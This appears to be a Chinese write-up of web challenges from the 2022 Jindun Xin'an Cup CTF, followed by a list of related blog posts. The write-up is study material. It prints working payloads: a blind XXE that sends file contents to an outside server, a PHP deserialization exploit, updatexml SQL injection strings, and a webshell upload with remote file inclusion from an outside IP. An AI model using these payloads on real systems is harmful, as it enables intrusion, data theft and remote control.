web

有来无回

考察xxe盲注
参考博客:https://blog.csdn.net/m0_49623330/article/details/113641498

<!ENTITY % a SYSTEM "http://vps/test.dtd">

%a;
] >
在自己服务器上编写dtd文件

<!ENTITY % dtd "<!ENTITY % hack SYSTEM 'http://vps:1234/%file;'> ">

%dtd;
%hack;

发包 监听

Base64在线解密
flag{tqxh8rvijg4jibuxuzfaarvq8esu24uz}

反败为胜

查看源代码:rc4加密,密码0626,

在线网站解码得到源码,

<?php echo("ser.php: You find me!"); class ouo{ private $ser_code = "ser"; function __destruct(){ if(!empty($this->ser_code)) { if($this->ser_code == "FLAG") echo ("{flag}"); else die('Try Again!'); }} function __wakeup(){ $this->ser_code=null; } } $ser_code = $_COOKIE['SER']; unserialize($ser_code); ?>

考察反序列化,编写exp:

<?php class ouo{ private $ser_code = "FLAG"; } $hack = new ouo(); $a = serialize($hack); $b = str_replace(':1:', ':2:',$a); echo urlencode($b); ?>

运行得到

O%3A3%3A%22ouo%22%3A2%3A%7Bs%3A13%3A%22%00ouo%00ser_code%22%3Bs%3A4%3A%22FLAG%22%3B%7D

访问ser.php,抓包
在cookie上传SER, 发包得到flag。

SQL

参考梦想CMS注入:http://www.hackdig.com/07/hack-724362.htm

查询表名
’ or updatexml(0,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1) #

%2527%2520or%2520updatexml(0%252Cconcat(0x7e%252C(select(group_concat(table_name))from(information_schema.tables)where(table_schema%253Ddatabase())))%252C1)%2520%2523

is_this_flag
查询字段名
’ or updatexml(0,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name=0x69735f746869735f666c6167))),1) #
%2527%2520or%2520updatexml(0%252Cconcat(0x7e%252C(select(group_concat(column_name))from(information_schema.columns)where(table_name%253D0x69735f746869735f666c6167)))%252C1)%2520%2523

flag

查询字段内容
’ or updatexml(0,concat(0x7e,(select(group_concat(flag))from(is_this_flag)where(1=1))),1) #

%2527%2520or%2520updatexml(0%252Cconcat(0x7e%252C(select(group_concat(flag))from(is_this_flag)where(1%253D1)))%252C1)%2520%2523

flag{e4cf1b90-75d1-11ed-9b3b-44

’ or updatexml(0,concat(0x7e,(select(reverse(flag))from(is_this_flag)where(1=1))),1) #

%2527%2520or%2520updatexml(0%252Cconcat(0x7e%252C(select(reverse(flag))from(is_this_flag)where(1%253D1)))%252C1)%2520%2523

}73257a82fa44-b3b9-de11-1d57-09

得到完整flag
flag{e4cf1b90-75d1-11ed-9b3b-44af28a75237}

Skip

原题
参考:https://hackinguko.tistory.com/30

脚本直接运行

flag{abe2ff50ebbc889f8b341fa53fd792e3}

eZphp

目录扫描发现index.php.bak
关键代码

上传一句话木马

http://59.110.213.14:41039/?f[name=4.php
POST:
f[content=<?php include$_GET[a];

远程文件包含

http://59.110.213.14:41039/4.php?a=http://81.69.221.177/9.txt
蚁剑连接

eZphp2

打开题目环境

写入一句话木马
http://59.110.213.14:47431/index.php?name[nnnn=1.php
POST:
file_c=<?=eval($_GET[a]);

http://59.110.213.14:47431/Upld0d/1.php?a=eval($_POST[1]);
蚁剑连接得到flag

flag{ff8f5e93-3169-4f39-b3a0-0ee692f96256}

2022-金盾信安杯相关推荐

  1. 河南省第四届”金盾信安杯”网络安全大赛writeup(过程,解题思路)

    目录 写在最最前面 Misc Misc-qianda0_Sdoku​编辑 Misc-盗梦空间 Misc-Megmi Misc-数据泄露01-账号泄露追踪 Web Web-eZphp2 Web-EzPH ...

  2. 河南省“第三届金盾信安杯“部分WP

    河南省"第三届金盾信安杯"部分WP Crypto Hi There 下载文件,打开发现一串字符,搜索在线栅栏解密,每组字数为4得到flag 低音吉他普 工具(base全家桶):ht ...

  3. data:image/png;base64,, CTF杂项base64图片隐写-河南省第二届金盾信安杯

    下载后得到这个东西 ** data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEsCAYAAAB5fY51AAASbUlEQVR4nO2bQbJrO ...

  4. 掌门人共话根技术 | 麒麟信安高级副总裁陈松政参加2022长沙·中国1024程序员节“岳麓对话”

    10 月 24 日,由湖南省工业和信息化厅.湖南湘江新区管理委员会指导,长沙市工业和信息化局.长沙信息产业园管理委员会和 CSDN 联合主办的"2022 长沙 · 中国 1024 程序员节& ...

  5. 2016风云杯大学生信安大赛 WriteUp

    2016风云杯大学生信安大赛 web 01 web 02 web 03 web 04 web 05 web 06 web 08 web 09 CRYPTO 01 misc 01 misc 02 mis ...

  6. 激发原创力量,逐梦数智未来 | 麒麟信安闪耀openEuler Summit 2022

    [中国,北京,2022年12月29日]由欧拉开源社区发起并联合华为.麒麟信安.麒麟软件.统信软件等伙伴,共同举办的openEuler Summit 2022于线上举行. 会上,开放原子开源基金会宣布o ...

  7. 2022世界计算大会 | 麒麟信安与湘江实验室达成战略合作,奔赴计算产业新征程!

    11月3日至5日,由湖南省人民政府.工业和信息化部联合主办的主题为 "计算万物· 湘约未来--计算产业新征程"2022 世界计算大会在湖南长沙举办.作为计算产业的重要建设者与参与者 ...

  8. 赛思信安携手太极 助力《甘肃省公安厅大数据警务云》项目

    项目背景 近年来,随着信息化技术的不断发展,现有的公安警务业务应用无论是规模还是架构都很难适应在海量数据场景下的数据管理和分析,直接影响了公安形势预判和重大决策.因此,建立"用数据说话.用数 ...

  9. 麒麟信安邀您抢先看 | openEuler 志高远,开源汇智创未来-开放原子全球开源峰会欧拉分论坛最详细议程出炉

    转自:openEuler官方公众号 2022开放原子全球开源峰会 OpenAtom openEuler 分论坛 2022年7月27日 9:00-12:00 北京市亦庄荣昌东街6号亦创国际会展中心 本次 ...

最新文章

  1. framer x使用教程_如何使用Framer Motion将交互式动画和页面过渡添加到Next.js Web应用程序
  2. 一道有关动态规划(Dynamic Programming)的网易面试题
  3. virtualbox centos5 分辨率_一种高分辨率、高帧率的LCoS显示芯片设计方法
  4. ABAP 的TABLE CONTROL实践积累
  5. boost::function_types::components用法的测试程序
  6. Django报错:ConnectionAbortedError: [WinError 10053] 你的主机中的软件中止了一个已建立的连接。...
  7. 一个页面是否应该全部组件化
  8. 苦酒入喉心作痛,红酒入鹅鹅想哭——震惊!勒索病毒想哭靠wine感染了Ubuntu16.04...
  9. elk 搜索 语法_ELK:kibana使用的lucene查询语法
  10. xml.query() 实例演示
  11. mysql5.3开发文件,cent0s 5.3该下载哪个版本的 mysql安装文件比较合适
  12. java多线程基础概念
  13. VM : linux虚拟机上挂在U盘
  14. 如何实现图像访问计数器
  15. 基于机器视觉的磁头飞机载划痕检测
  16. lodop简单入门教程
  17. Linux下Apache服务器配置
  18. 苹果笔记本链接刷卡打印机教程
  19. CRM客户关系管理系统开发第七讲——实现客户管理模块中删除客户的功能
  20. excel学习-日期计算函数DATEDIF函数(计算相隔年数、月数、天数)

热门文章

  1. (学习笔记)投影与三维视觉——本征矩阵和基础矩阵
  2. 如何在QT界面显示图片以及修改图标
  3. 服务器绑定域名的步骤
  4. #!/usr/bin/env与#!/usr/bin/
  5. Auto Photoshop StableDiffusion - 这是一款可以在 Photoshop 中使用 AI 智能 Automatic1111 进行插画、海报等设计的插件
  6. C#自动给达尔文视频服务器推流的实现方法
  7. 解决Windows虚拟机启动资源占用过多
  8. resultMap的用法
  9. Unity 灯光设置 —— 灯光属性
  10. mysql中修改密码无效_mysql8.0修改密码无效的问题